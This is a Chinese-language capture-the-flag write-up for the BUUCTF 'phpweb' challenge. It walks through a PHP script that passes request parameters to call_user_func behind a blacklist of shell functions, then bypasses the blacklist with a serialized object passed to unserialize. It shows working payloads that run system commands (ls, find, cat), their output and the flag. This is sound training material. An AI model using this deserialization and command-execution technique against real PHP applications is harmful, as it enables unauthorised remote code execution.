1.phpweb-[网鼎杯 2020 朱雀组]-[传送门->BUUCTF]
第一步:点击 传送门,打开题目环境
观察题目页面:
//打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。
//利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数。
//首先尝试system()函数,参数为任意命令,(这里使用burp的Repeater功能,便于修改参数,查看返回结果)。返回结果如下,显示hacker,说明后端可能对该函数进行过滤。
//抓包,Ctrl+r,读取主页面源码
//func=highlight_file&p=index.php
//func=file_get_contents&p=index.php
//func=readfile&p=index.php
在传递参数的时候,发现有报错信息,从而发现到使用了call_user_func()函数
//回调函数:call_user_func()
//call_user_func是PHP的内置函数,该函数允许用户调用函数并传入一定的参数
//call_user_func($func, $p)
//$func传入函数名字
//$p传入参数
//$p会被回调进$func函数内,执行一次,返回结果
第二步:代码审计
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");、
//很明显:定义的黑名单数组$disable_fun
function gettime($func, $p) { //自定义函数gettime(),使用两个参数$func、$p传递值
$result = call_user_func($func, $p); //很明显,这里使用了回调函数,$func传入函数名字,$p传入参数;并且执行后把它赋值给$result变量
$a= gettype($result); //取$result变量的数据类型,并且赋值给$a变量
if ($a == "string") { //判断$a变量是否为字符串类型
return $result; //若是,返回回调函数的结果
} else {return "";} //若不是,则返回空
}
class Test { //类:Test
var $p = "Y-m-d h:i:s a"; //var公有属性:$p var是什么意思,这里是指public的别名
var $func = "date"; //var公有属性:$func var是什么意思,这里是指public的别名
function __destruct() { //析构方法__destruct:在当前类的实例化对象销毁前,自动被调用
if ($this->func != "") { //判断$func属性的值是否弱等于空,也就是值不等于或者类型不等于
echo gettime($this->func, $this->p); //若不弱等于,则执行gettime()函数
}
}
}
//很明显:这里需要Test类的实例化对象,然后$func属性控制函数,$p控制参数,然后在析构函数执行的时候,传入gettime()函数执行
//gettime()函数又把两个属性传入了call_user_func()回调函数,只要满足这个回调函数的结果类型弱等于string,可以执行回调函数,并且返回结果
//那么我们怎么自定义一个类的实例化对象,再传入呢???
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
//很明显:这里可以传递参数值,只要不是黑名单里面的函数,都可以调用gettime()函数,但是如果绕过不呢
//注意类也可以执行gettime()函数,只要我们把之前分析的实例化对象序列化了,再通过传入反序列化函数和参数即可绕过黑名单,然后坐等执行析构方法,然后继续执行gettime()函数,此时的两个参数就是我们构造的对象里面的属性了
?>
第三步:思路
有两处执行gettime()函数的地方,一处有黑名单过滤,一处没有黑名单过滤
只要我们想办法在没有黑名单的析构方法里面执行这个函数即可
所以:
第一步:我们要创建该类的实例化对象,且属性的值对应函数和参数
第二步:然后把该对象序列化,再把这个序列化字符串当作参数,同时传入反序列化函数即可
第四步:编写代码,构造payload
<?php
class Test {
var $p;
var $func;
}
$chen = new Test();
#$chen->p = 'ls -la'; //列出当前目录下的文件
#$chen->p = "find / -name 'flag'*"; //寻找flag文件
$chen->p = "cat /tmp/flagoefiu4r93"; //查看flag文件
$chen->func = 'system';
$chen = serialize($chen);
echo $chen."<br />";
//O:4:"Test":2:{s:1:"p";s:6:"ls -la";s:4:"func";s:6:"system";}
//O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag'*";s:4:"func";s:6:"system";}
//O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
payload1:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:6:"ls -la";s:4:"func";s:6:"system";}
payload2:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag'*";s:4:"func";s:6:"system";}
payload3:
?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
第五步:提交payload,获取flag
提交payload1:
total 88
drwxr-xr-x 1 root root 37 May 17 2020 .
drwxr-xr-x 1 root root 18 Aug 10 2016 ..
-rw-r--r-- 1 root root 82910 May 17 2020 bg.jpg
-rw-r--r-- 1 root root 1770 May 17 2020 index.php
-rw-r--r-- 1 root root 1770 May 17 2020 index.php
提交payload2:
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/sys/kernel/sched_domain/cpu10/domain0/flags
/proc/sys/kernel/sched_domain/cpu11/domain0/flags
/proc/sys/kernel/sched_domain/cpu12/domain0/flags
/proc/sys/kernel/sched_domain/cpu13/domain0/flags
/proc/sys/kernel/sched_domain/cpu14/domain0/flags
/proc/sys/kernel/sched_domain/cpu15/domain0/flags
/proc/sys/kernel/sched_domain/cpu2/domain0/flags
/proc/sys/kernel/sched_domain/cpu3/domain0/flags
/proc/sys/kernel/sched_domain/cpu4/domain0/flags
/proc/sys/kernel/sched_domain/cpu5/domain0/flags
/proc/sys/kernel/sched_domain/cpu6/domain0/flags
/proc/sys/kernel/sched_domain/cpu7/domain0/flags
/proc/sys/kernel/sched_domain/cpu8/domain0/flags
/proc/sys/kernel/sched_domain/cpu9/domain0/flags
/sys/devices/pnp0/00:04/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/eth0/flags
/sys/devices/virtual/net/eth1/flags
/sys/devices/virtual/net/lo/flags
/tmp/flagoefiu4r93
/tmp/flagoefiu4r93
提交payload3:
flag{06a7c1f8-1e07-40c4-91f9-2f6b21a6747c} flag{06a7c1f8-1e07-40c4-91f9-2f6b21a6747c}
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/110002935